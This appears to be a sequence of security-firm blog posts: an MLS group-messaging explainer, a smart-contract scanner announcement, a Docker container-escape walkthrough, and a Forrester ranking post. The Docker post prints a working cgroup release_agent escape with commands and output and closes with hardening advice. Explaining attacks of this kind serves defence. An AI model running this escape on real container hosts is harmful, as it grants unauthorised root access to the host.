Better Encrypted Group Chat

Broadly, an end-to-end encrypted messaging protocol is one that ensures that only the participants in a conversation, and no intermediate servers, routers, or relay systems, can read and write messages. An end-to-end encrypted group messaging protocol is one that ensures this for all participants in a conversation of three or more people.

End-to-end encrypted group messaging is a necessary problem to solve. Whether it be for limiting liability, providing verifiable client-side security, or removing a single point of failure, there are good reasons for a group messaging host to use an end-to-end encrypted protocol.

End-to-end encrypted group messaging is also a hard problem to solve. Existing solutions such as Signal, WhatsApp, and iMessage have inherent problems with scaling, which I’ll discuss in detail, that make it infeasible to conduct group chats of more than a few hundred people. The Message Layer Security (MLS) protocol aims to make end-to-end encrypted group chat more efficient while still providing security guarantees like forward secrecy and post-compromise security.1

To these ends, I’ve been working on molasses, a Rust implementation of MLS, designed with safety, ease-of-use, and difficulty-of-misuse in mind.

Molasses has helped refine the MLS spec

The primary contribution of molasses has been in detecting errors in the specification and other implementations through unit and interoperability testing. Molasses implements most of MLS draft 6. Why not all of draft 6? There was an error in the spec that made it impossible for members to be added to any group. This broke all the unit tests that create non-trivial groups. Errors like this are hard to catch just by reading the spec; they require some amount of automated digging. Once they are found, the necessary revisions tend to be pretty obvious, and they are swiftly incorporated into the subsequent draft.

Iterating this discovery/patching process using molasses has given me a chance to put the spec through its paces and help make things clearer. This winter internship (“winternship”) project has been a great experience, especially as a first-time IETF contributor.

How to build encrypted group chat

In this section we derive why MLS is constructed the way it is (hint: for efficiency reasons), and how it compares to other solutions (hint: it’s better).

First off, MLS works on a lower level than most chat applications. It is a protocol upon which applications can be built. For example, MLS does not govern group permissions such as who can add people to the chat — this would be done by an application using MLS under the hood). Thus, we can leave things like formal rule systems out of the conversation entirely when analyzing the protocol. Here, we’re only going to consider the sending of messages and the removal of members.

The following section makes use of cryptographic primitives such as digital signatures, Diffie-Hellman key exchange, (a)symmetric encryption, and key-derivation functions. If the reader feels underprepared in any of these areas, a quick skim of the sections in Serious Cryptography on ECIES and Authenticated Diffie-Hellman should be sufficient.

Without further ado,

A Motivating Problem

Wilna is planning a retirement party for an acquaintance, Vince. The logistics are a nightmare, so she invites her friends Xavier, Yolanda, and Zayne to help her plan. They would like to make a group chat on Slack so they can all stay on the same page, but they remember that Vince is an infrastructure manager for Slack—he can see all the messages sent over any Slack server in the world. This is a problem, since they want to give Vince a nice long vacation upstate and they want it to be a surprise. Vince’s position poses even more problems: he happens to manage every single server in town. Even if Wilna purchases her own server to mediate the group chat, Vince will be tasked with managing it, meaning that he can read everything the server stores.

What Wilna needs is a centralized end-to-end encrypted group chat, i.e., a group chat where every member can broadcast messages and read all incoming messages, but the single server that mediates these messages cannot read anything. For clarity, we’ll distinguish between application messages, which carry the textual content of what a group member wants to say to everyone else in the group, and auxiliary messages (called “Handshake messages” in MLS), which members use to manage group membership and cryptographic secrets. Since this is all mediated through one server, the members can rely on the server to broadcast their messages to the rest of the group.

With the setup out of the way, what are the options?

Solution #1: Pairwise Channels

Suppose Wilna, Xavier, Yolanda, and Zayne all know each other’s public keys for digital signatures. This means that each pair of people can do an authenticated Diffie-Hellman key exchange over some auxiliary messages and derive a shared symmetric key called the pair key. This process produces six separate pairwise channels, represented here:

If Wilna wants to send an application message m to the group, she has to encrypt it three separate times (once for each member of the group) and send all the ciphertexts:

The grey arrows represent application messages encrypted under a symmetric key.

Note that Wilna isn’t making use of the server’s ability to broadcast messages, since each member in the group can only decrypt messages encrypted under their own pair keys. Generalizing this, if there is a group of size N, sending an application message requires a member to encrypt and send N-1 times. Roughly speaking, this is how iMessage does group chat.2

Great, so that’s just three encryptions per person. This probably takes at most a few milliseconds on a phone. What’s the issue? The issue is what about the WhatsApp group with >10,000 members where my aunts talk about who’s getting married next? Do you want them to do 9,999 encryptions every time they send something? I do, but they probably don’t. To accommodate my aunts, we need to get cleverer.

Solution #2: Sender Keys

Instead of having a key between every user in the group, let’s give every user a sender key that they use to encrypt application messages. This is roughly what Signal2, WhatsApp2, and Keybase do. If you’re a group member, you have to go through the following setup:

  1. Randomly generate your sender key
  2. For every user in the group, encrypt your sender key with your pair key that you share with that user
  3. Send every user their encrypted copy of your sender key as an auxiliary message

After the setup, which requires N-1 encryptions for each user in a group of size N (that’s Θ(N2) total auxiliary messages), we finally see some efficient behavior. To send an application message m, Wilna:

  1. Encrypts m with her sender key precisely once
  2. Broadcasts the ciphertext to the group

The grey arrows represent application messages encrypted under a symmetric key.

The grey arrows represent application messages encrypted under a symmetric key.

Although there are three arrows here, they are all the same ciphertext, so the application message only needs to be encrypted and broadcast once. Thus, after the setup phase, each outgoing application message only costs a single encryption. So we’re done, right? Wrong, of course wrong. Because…

What about Removal?

The fallacy here is that the setup phase runs once. It actually runs every time the group is modified. Suppose in the process of premeditating this “retirement party,” the group finds out that Zayne has been leaking details to Vince the whole time. Naturally, they kick Zayne out. Now Zayne still knows all the sender keys, so if he talks to Vince and gets an encrypted transcript of the group conversation that happened after his departure, he would still be able to decrypt it. This is a no-no, since Zayne has already defected. To prevent this from happening, each remaining user in the group has to create a new sender key and share it with everyone else through their pairwise channels. Again, this is Θ(N2) total auxiliary messages, which can be a lot. So if we want to tolerate tons of group modifications,3 we’re going to have to find a way to bring down the number of auxiliary messages sent during the setup phase, while still being able to keep using sender keys for application messages. A well-known secret in computer science is that when the naïve solutions of pairs and lists don’t work, there’s a next logical step:

Solution #3: Trees

We would like to have sender keys (since they make application messages efficient). We also want to be able to transmit new sender keys to subsets of the group without using too many auxiliary messages. The important insight here is that, when we remove a member, we shouldn’t need to individually send new keying information to every single remaining member like we had to in the previous solution. After all, we need to send this to the whole group minus just one person. So why not have public keys that cover large subsets of the group, and use those for sending auxiliary messages? This is exactly what the MLS ratchet tree (a.k.a. TreeKEM) affords us.

The MLS ratchet tree is a binary tree4 whose leaves correspond to members of the group, and whose non-leaf nodes, called intermediate nodes, carry a Diffie-Hellman public key and private key. Intermediate nodes don’t represent people, computers, or locations on a network; they’re just pieces of data that facilitate auxiliary message sending. We also allow nodes to be blank, meaning that they do not have an associated keypair. A node that does have an associated keypair is said to be filled. Every member in the group retains a copy of the ratchet tree, minus the private keys. Knowledge of the private keys follows the ratchet tree property:

Ratchet Tree Property If a member M is a descendant of intermediate node N, then M knows the private key of N.

*deep breath* Sender keys are derived via key-derivation function (KDF) from the root node’s private key, and private keys are derived via KDF from its most-recently updated child’s private key.5 Upon the removal of a user, new private keys are distributed to the resolutions of the copath nodes, i.e, the maximal non-blank nodes of the subtrees whose root is the sibling of an updated node.

That paragraph alone took about 10 minutes to write, so let’s just see…

A Small Example

We start off with a group like so:

Zayne wants out, so Yolanda removes him.6 To remove him, Yolanda will first blank out Zayne and all his ancestors:

The boxes with red slashes through them represent blank nodes.

The boxes with red slashes through them represent blank nodes.

Yolanda needs to contribute new keying information to the new group so that the new sender keys can be derived from the new root’s private key. To do this, she generates a new personal keypair pubY’ and privY’ and derives all her ancestors’ keypairs by iteratively applying a KDF to the private key and computing its corresponding public key (this is called “ratcheting,” whence “ratchet tree”).

The green circles indicate recently updated nodes.

But Yolanda isn’t done. Wilna and Xavier need to be told about these new keys somehow. It’s Yolanda’s job to share this info. In particular,

  1. Every member needs to get a copy of the public keys of all updated nodes (i.e., Yolanda’s own public key and all her ancestors’). This is important. The public keys are part of the shared group state, and shared group state is how a bunch of values in the MLS protocol are derived.
  2. Every member needs to get a copy of the private keys of their nearest modified ancestor. This is in order to preserve the ratchet tree property.

Remember that the end goal is still to derive the sender keys, which means that Wilna and Xavier need to be told the value of the root private key, privY”’. This will be a consequence of item two above.

Since everyone needs public keys and public keys are not secret, Yolanda can just broadcast them as unencrypted auxiliary messages. But private keys are more sensitive. She needs to encrypt them for just the members who need them. This is where we use the ratchet tree property. If she wants Wilna and Xavier to be able to read an auxiliary message containing privY”’, she need only encrypt the message under pubWX, since Wilna and Xavier are descendants of the WX intermediate node, and will therefore be able to decrypt anything encrypted under pubWX.7 This describes how the auxiliary messages are sent to the rest of the group:

The solid black arrows above indicate public-key encrypted messages. The dashed arrows indicate plaintext messages. The arrows do not indicate who is doing the sending (since that’s all Yolanda). They’re just meant to illustrate where in the tree the values are coming from and whom they’re intended for.

Now Wilna and Xavier will update their view of the tree by saving the public keys and decrypting the root private key. Thus, everyone is on the same page and the ratchet tree property is preserved. Finally, everyone re-derives their sender keys, and the removal is complete:

Note that Zayne’s position remains blank after the removal. This saves the members from the computational overhead of shuffling themselves around and recomputing their ancestors’ keypairs. MLS defines two ways to prevent removed members from overcrowding the tree: it allows blank nodes to be removed from the right end of the tree after removals (not applicable in the example above), and it allows new members to be added in the position of previously removed members. So if the “party-planners” above wanted to replace Zayne, they could do so without making the tree bigger.

This example illustrates the smaller details in updating keys, but it doesn’t do a particularly good job at illustrating which node secrets are sent to which other nodes in the resolutions of the copath nodes. To give an idea, here’s…

A Much Bigger Example

Suppose Zayne wants to break out and go solo, but still feels the desire to be in a boy band. After cloning himself 15 times, Zayne #1 notices that one of the clones, Zayne #11, keeps hinting at breaking off and doing a solo career of his own. Zayne #1 acquiesces and removes him from the group. He sees what he’s created. Zayne #1 looks up at the stars. War soon.

Let’s see what auxiliary messages were sent when Zayne #11 was booted. In this removal process, Zayne #1 generates new secrets, ratchets them all the way up the tree, and shares them with the appropriate subtrees:

The green circles still represent the updated nodes. The solid arrows represent the private key of its tail being encrypted under the public key of its head.

The green circles still represent the updated nodes. The solid arrows represent the private key of its tail being encrypted under the public key of its head.

Notice on the right hand side of the tree, since you can’t encrypt to a blank node, the root private key needs to be encrypted under three separate public keys. The dashed arrows were omitted for clarity, but it’s still true that the public keys of all the circled nodes are broadcasted in this step.
With this larger example, you might start to see some pattern in how many auxiliary messages are sent per tree update. Let’s play

Can You Eyeball the Asymptotic Behavior?

We got efficient application messages with sender keys, and we’d like to say that we got efficient auxiliary messages with TreeKEM so we can call it a day. Is this true? Absolutely not, at least not entirely. Let’s first talk about the example above, where we start off with a tree whose nodes are all filled.

Removal in a Filled Tree

The Zayne example is actually worst-case removal behavior in a filled tree in terms of number of auxiliary messages (you should prove this to yourself: what would happen if Zayne #1 removed Zayne #6 instead?). If there are N many members in the group, there are at most log(N)-1 encrypted auxiliary messages that don’t have to deal with blank nodes, and another log(N)-1 that do. Plus, there are log(N) many public keys to share. So, to complete the sage wisdom from computer scientists of days past, if you use trees, you get O(log(N)) behavior. This is way better than the quadratic number of auxiliary messages we saw in solution #2. The same WhatsApp group of kibbitzing mumehs now only takes about 3log2(10,000) ≈ 40 total auxiliary messages to establish a new set of sender keys (assuming a filled tree) instead of the N(N-1) ≈ 99 million total auxiliary messages required previously.

Removal in a Tree with Blanks

This logarithmic behavior is fantastic, but we only checked for the very specific case where we start with a full group and then remove one person. How efficient is it when we remove a single person from a group that already has some blanks? The good news is that it’s still better than Θ(N2). The bad news is that the worst case is… well let me just show you.

Suppose every odd-numbered Zayne was removed from the group besides Zayne #1. Finally, Zayne #2 deals the finishing blow, removing Zayne #1 and restoring peace. Here is what the update looks like:

That’s N-1 messages to remove a single person! As mentioned before, this can be a prohibitively large number of auxiliary messages for large N. Even worse, it may be possible for malicious group members to strategically remove people until the tree reaches the worst-case state, thus slowing down group operations for everyone in the group.

Dealing with this situation is an open issue, and people are actively working on resolving or at least mitigating it. As of this writing, though, there are no proposed solutions that would materially improve the worst-case behavior.

Conclusion and More Info

It’s underwhelming to end at an open issue, but this is where the protocol stands today. Efficiently updating keys is at the crux of end-to-end group messaging. The TreeKEM method, edge cases and all, is one of the most important singular contributions that MLS makes. Given that there’s still at least one open issue in the spec, you may wonder

How close is the protocol to being done?

No clue. MLS has plenty of open issues (nine as of this writing) and is being tweaked constantly. Draft 7 landed just this month, and it completely overhauled the symmetric key schedule. Inefficiencies are being shaved down as issues around authenticity, confidentiality, deniability, etc. are being patched.

What are the other implementations?

The unofficial reference implementation, mlspp, is used to create test vectors that we implementers all test against. There’s also MLS*, a project at Inria to implement and formally model the protocol in F*. And there’s even another Rust implementation, melissa, being written at Wire.

Remind me why you’re writing yet another Rust implementation?

The more implementations the better. Writing this implementation has helped find errors in mlspp and the specification itself.

Errors found in mlspp include missing important fields (missing protocol version and missing hash of WelcomeInfo, which enforces sequencing), incorrect tree addressing (using leaf indices instead of node indices and vice-versa), and incorrectly generated test vectors. Errors in the specification that we found include ambiguities (how are removed nodes pruned from the ratchet tree?), logical impossibilities (how can you add a user to the group if your WelcomeInfo doesn’t include the current decryption keys?), and deontological omissions (SHOULD8 a user verify the broadcasted pubkeys against their derived pubkeys or not?).

Ok great, but why Rust?

*cracks knuckles*

I thought it would be nice to have an MLS implementation that has a clear API (thanks to molasses’ careful design and Rust’s strong typing), memory-safe semantics (thanks to the Rust borrow checker), thorough documentation (thanks to cargo doc and molasses’ current 43% comment-code ratio), and good performance (thanks to ZERO-COST-ABSTRACTIONS). Of course, none of these features make up for the fact that molasses is not formally verified like MLS* and may never be, but hey, nobody ever complained that cotton isn’t as bulletproof as kevlar, cuz those are for different things.

How can I help?

I don’t recommend filing issues with molasses quite yet. The spec is moving too quickly and the library has to be redesigned accordingly each time. If you would like to contribute, the MLS IETF page has a mailing list where you can read and participate in discussions. The organizers are helpful and patient, and I appreciate them immensely. If you want to write your own implementation, see the implementers’ Github repo for organizing info and test vectors.

If you are interested in reading more about the protocol and seeing some of the other open issues, you should give the spec9 a read.

“I want your expertise”

Well that’s going to cost you. We offer consulting in end-to-end protocol design, engineering, and auditing. Drop us a line on our contact page if you’re interested.

Thanks for reading! If you have questions or corrections, please feel free to email me at


  1. Full post-compromise security, i.e., the problem of non-deterministically deriving all new shared data so as to make the excluded parties unable to participate, is actually not easily achieved in this scheme. There is ongoing research in characterizing how post-compromise secure MLS is after a certain number of group updates.
  2. Source. This is a fantastic paper which provides a lot of context for this article. Seriously, if you want to understand this topic better, you should read the MLS spec and this paper and compare the two, since they differ in pretty subtle but significant ways. E.g., the ART scheme used in the paper does not allow intermediate nodes to be blank, which affects confidentiality of messages sent to offline members.
  3. The problem of Removal in this article is a placeholder for (a weaker form of) post-compromise security. Here, “group modifications” includes updating key material without changing group membership.
  4. Specifically, it is a left-balanced binary tree. This is fancy computer talk for “every left subtree is full,” which itself is fancy computer talk for “it behaves good when stuffed into an array.”
  5. Both these statements are technically false, but it’s way easier to think of things this way, and it’s close enough to the truth imo. In reality, sender keys are derived from a long chain of secret values relating to group state and state transitions. Node private keys are simpler, but they are also derived from chains of other secrets called “node secrets” and “path secrets.” As always, see the spec for more details.
  6. MLS doesn’t allow users to remove themselves. This is a quirk of the protocol, but it doesn’t really affect anything.
  7. If you’re confused why I say all these keys are DH keys and then use public-key encryption, it’s because the public-key encryption in MLS is done with ECIES. More specifically, it’s HPKE.
  8. The all-caps “SHOULD” means something specific in IETF RFCs. Its meaning is governed by not one but two RFCs, which are referred to as Best Current Practice 14. The linguistic conventions of RFCs are super cool and alone make it worth skimming a few specs and paying attention to their “conventions and terminology” sections. TLS is as good a place to start as any.
  9. If you want a particularly nice reading experience, you should compile the spec yourself from source. It really is appreciably better.

SVGs of the images in this post are available.

Crytic: Continuous Assurance for Smart Contracts

Note: This blog has been reposted from Truffle Suite’s blog.

We are proud to announce our new smart contract security product: Crytic provides continuous assurance for smart contracts. The platform reports build status on every commit and runs a suite of security analyses for immediate feedback.

The beta will be open soon. Follow us on twitter to be notified and benefit from the service as soon as possible! The first three months are free.

How Crytic will secure your smart contracts

Once connected to your GitHub repository, Crytic will continuously:

  • Run our static analyzer Slither, which detects the most common smart contracts vulnerabilities and will save you from critical mistakes.
  • Run your Truffle tests to ensure that no functional bugs are added while developing your project.

Slither will analyze your codebase for more than 60 security flaws, including reentrancy, integer overflows, race conditions, and many others. Half of these flaw-detectors are private and were not available to the public. They can detect flaws for which public knowledge is limited and that no other tool can find. The recent GridLock bug would have been detected ahead of time using Crytic!

We built this platform for developers, so we integrated it with GitHub. It will watch every commit and branch to ensure that bugs are not added during development. In addition, Crytic will run the checks on every PR to facilitate your code review.

For every security issue found, Crytic will:

  • Show you a detailed report on the bug, including source-code highlighting.
  • Allow you to create a GitHub issue to keep track of the fixes easily.
  • Let you triage the results, so you can decide what needs to be fixed.

Quick Walkthrough

Adding Crytic to your system is straightforward: you just need to connect to your GitHub repository. We have first-class support for Truffle; it works out of the box! We also support most of the other smart contract platforms, including Embark, Dapp, and Etherlime. After adding your repository, the dashboard (Figure 1) will show you a summary of the project, like this crytic-demo:

Figure 1: The Crytic Dashboard

From now on, you will benefit from continuous security analyses.

Issue reports

Finding an issue is only the first part. Crytic will provide you with detailed information you need about the bug to fix it:

Figure 2: Reports provide detailed information needed to understand and fix issues

A careful reader will notice the vulnerability here: function constuctor creates a public function (with a typo!) that is callable by anyone instead of being run only at initialization. Crytic will detect these types of critical mistakes instantaneously.

Triaging issues

Once a bug has been found, the user can decide to:

  • create a GitHub issue, to easily keep track of the fix, or
  • discard the issue.

Figure 3: Crytic easily creates GitHub issues for selected reports

Crytic follows the modifications to your code and reports only new bugs that are introduced. Each new PR will be analyzed automatically:

Figure 4: Crytic is fully integrated with GitHub Pull Requests

What’s next for Crytic

We are constantly improving Crytic. Expect to see new bug detectors and new features in the future. We are planning to add:

  • Echidna and Manticore integration: to ensure your code is checked for custom security properties.
  • Automatic bug repair: Crytic will propose patches to fix the issues it finds.
  • Slither printer integration: to help visualize the underlying details of your code.
  • Delegatecall proxy checker: to prevent you from making critical—and all too common—mistakes in your upgradeability process.

Questions? Bring them to TruffleCon, and pose them to us at our booth or at our Friday workshop on automated vulnerability detection tools!

Whether or not you can make it to TruffleCon, join our slack channel (#crytic) for support, and watch @CryticCI to find out as soon as our beta is open.

Understanding Docker container escapes

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes.

Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature.

Here’s a version of the PoC that launches ps on the host:

# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.

Don’t run containers with --privileged. Docker includes granular settings that independently control the privileges of containers. In our experience, these critical security settings are often forgotten. It is necessary to understand how these options work to secure your containers.

In the sections that follow, we’ll walk through exactly how this “container escape” works, the insecure settings that it relies upon, and what developers should do instead.

Requirements to use this technique

In fact, --privileged provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are:

  1. We must be running as root inside the container
  2. The container must be run with the SYS_ADMIN Linux capability
  3. The container must lack an AppArmor profile, or otherwise allow the mount syscall
  4. The cgroup v1 virtual filesystem must be mounted read-write inside the container

The SYS_ADMIN capability allows a container to perform the mount syscall (see man 7 capabilities). Docker starts containers with a restricted set of capabilities by default and does not enable the SYS_ADMIN capability due to the security risks of doing so.

Further, Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.

A container would be vulnerable to this technique if run with the flags: --security-opt apparmor=unconfined --cap-add=SYS_ADMIN

Using cgroups to deliver the exploit

Linux cgroups are one of the mechanisms by which Docker isolates containers. The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

1.4 What does notify_on_release do ?
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.

Linux Kernel documentation on cgroups v1

Refining the proof of concept

There is a simpler way to write this exploit so it works without the --privileged flag. In this scenario, we won’t have access to a read-write cgroup mount provided by --privileged. Adapting to this scenario is easy: we’ll just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Breaking down the proof of concept

Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.

To trigger this exploit we need a cgroup where we can create a release_agent file and trigger release_agent invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.

To do that, we create a /tmp/cgrp directory, mount the RDMA cgroup controller and create a child cgroup (named “x” for the purposes of this example). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.

If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change rdma to memory to fix it. We’re using RDMA because the original PoC was only designed to work with it.

Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another.

We can see the “x” child cgroup creation and its directory listing below.

root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks  x
root@b11cf9eab4fd:/# ls /tmp/cgrp/x
cgroup.clone_children  cgroup.procs  notify_on_release  rdma.current  rdma.max  tasks

Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its notify_on_release file. We also set the RDMA cgroup release agent to execute a /cmd script — which we will later create in the container — by writing the /cmd script path on the host to the release_agent file. To do it, we’ll grab the container’s path on the host from the /etc/mtab file.

The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host.

Those operations can be seen below:

root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

Note the path to the /cmd script, which we are going to create on the host:

root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent

Now, we create the /cmd script such that it will execute the ps aux command and save its output into /output on the container by specifying the full path of the output file on the host. At the end, we also print the /cmd script to see its contents:

root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
root@b11cf9eab4fd:/# cat /cmd
ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output

Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a /bin/sh process and writing its PID to the cgroup.procs file in “x” child cgroup directory, the script on the host will execute after /bin/sh exits. The output of ps aux performed on the host is then saved to the /output file inside the container:

root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
root         1  0.1  1.0  17564 10288 ?        Ss   13:57   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    13:57   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_gp]
root         4  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_par_gp]
root         6  0.0  0.0      0     0 ?        I<   13:57   0:00 [kworker/0:0H-kblockd]
root         8  0.0  0.0      0     0 ?        I<   13:57   0:00 [mm_percpu_wq]
root         9  0.0  0.0      0     0 ?        S    13:57   0:00 [ksoftirqd/0]
root        10  0.0  0.0      0     0 ?        I    13:57   0:00 [rcu_sched]
root        11  0.0  0.0      0     0 ?        S    13:57   0:00 [migration/0]

Use containers securely

Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the --privileged flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.

To help keep containers secure:

  • Do not use the --privileged flag or mount a Docker socket inside the container. The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the --privileged flag.
  • Do not run as root inside the container. Use a different user or user namespaces. The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
  • Drop all capabilities (--cap-drop=all) and enable only those that are required (--cap-add=...). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
  • Use the “no-new-privileges” security option to prevent processes from gaining more privileges, for example through suid binaries.
  • Limit resources available to the container. Resource limits can protect the machine from denial of service attacks.
  • Adjust seccomp, AppArmor (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required.
  • Use official docker images or build your own based on them. Don’t inherit or use backdoored images.
  • Regularly rebuild your images to apply security patches. This goes without saying.

If you would like a second look at your organization’s critical infrastructure, Trail of Bits would love to help. Reach out and say hello!

Trail of Bits Named in Forrester Wave as a Leader in Midsize Cybersecurity Consulting Services

Trail of Bits was among the select companies that Forrester invited to participate in its recent report, The Forrester Wave™: Midsize Cybersecurity Consulting Services, Q2 2019. In this evaluation, Trail of Bits was cited as a Leader. We received the highest score among all participants in the current offering category, among the highest scores in the strategy category, and the highest scores possible in sixteen of the evaluation’s criteria.

You can download the full report here!

What is the Forrester Wave™?

Forrester is a leading global research and advisory firm that offers a variety of market reports, research, analysis, and consulting services. The Forrester Wave is a specific Forrester evaluation that provides “a guide for buyers considering their purchasing options in a technology marketplace.”

When Forrester reached out to us to participate in their study, we jumped at the chance. We respect their publication a lot. In our view, the Wave is:

  • A trusted source of truth for top companies – Forrester reports are the gold standard for citations on market data.
  • It’s not a paid publication – If they find a weakness in a participant’s company, they won’t gloss over it.
  • The criteria are thoughtful – It’s hard to fully comprehend what’s important in cybersecurity consulting, especially for someone relatively new to our niche industry. Assessing efficacy is tough even if you know what you’re looking for. Forrester overcomes this by getting feedback on its questions and ranking criteria from participants.

What happened?

Forrester reached out to us and our competitors for an introductory call on how to prepare as participants. We were given the option to opt-out of participating but told we would be included in the report, regardless. Participants then provided feedback on criteria that Forrester Wave would use to assess our competencies. Once the criteria were finalized, Forrester gathered data from us and from some of our clients on how we performed against those criteria. When their report was complete, they let all participants fact-check the report. Needless to say, we were pleased to see that we’d received the highest score in the Current Offering category, and among the highest scores in the Strategy category.

The results

In addition to our ranking, Forrester made this analysis of our strengths and weaknesses:

Trail of Bits’ innovation efforts set its technical services apart. Its unique services include binary analysis, blockchain security, cryptography, and software development — many of which rely on tools that Trail of Bits developed in-house. Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent. It hosts a variety of office hours and local meetups and develops free educational resources for all levels of cybersecurity professionals. Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths. However, those high standards come with some drawbacks as customers also noted limited resources and price as concerns. Trail of Bits’ deliverables are quite technical, and clients needed to do some extra translation of those deliverables for nonsecurity[sic] executives. For clients seeking a high level of technical cybersecurity proficiency from its services firm, Trail of Bits is a top-tier choice.

Our reflections

We’re celebrating the good

Trail of Bits’ innovation efforts set its technical services apart.

Our Take: Indeed! Our investments in R&D, our focus on using cutting-edge open source tooling, and our preference for tackling tough problems helps us hone our advanced techniques and innovative approach.

Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent.

Our Take: We’re happy for this work to shine through! We’re passionate about empowering emerging talent with the information and skills necessary to break into our industry and push science forward with us. Sharing our proprietary tools open-source, sharing knowledge through online resources and our Empire Hacking meetup, and sponsoring emerging research are all core to our mission.

Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths.

Our Take: We are intentional about focusing deeply on our niche skillset because it prepares us for solving our clients’ most challenging problems. We produce and use publicly available tools in our assessments, resulting in repeatable, verifiable results that other firms can’t offer.

We’re finding more ways to improve

Even as a Leader, this report shows us some opportunities for improvement. Our efforts to grow at a pace that meets increasing market demands for our services is a challenge. We prefer to hire well rather than hire quickly. We know that the price point of our niche services puts our paid expertise out of reach for some smaller and under-resourced companies. We will address that by continuing to offer our knowledge on our blog, our open-source tools on github, and our community resources like Empire Hacking and the NYC-Infosec directory. Finally, we are committed to translating summaries of our highly technical work for clients’ non-security executives. You can check out how we’re doing that in our public reports and presentations.

Overall, we’re honored to be included in this year’s report, encouraged by its findings, and excited to share the results.

Could you use a Forrester Wave Leader’s advice on a cybersecurity problem you’re facing? Contact us

On LibraBFT’s use of broadcasts

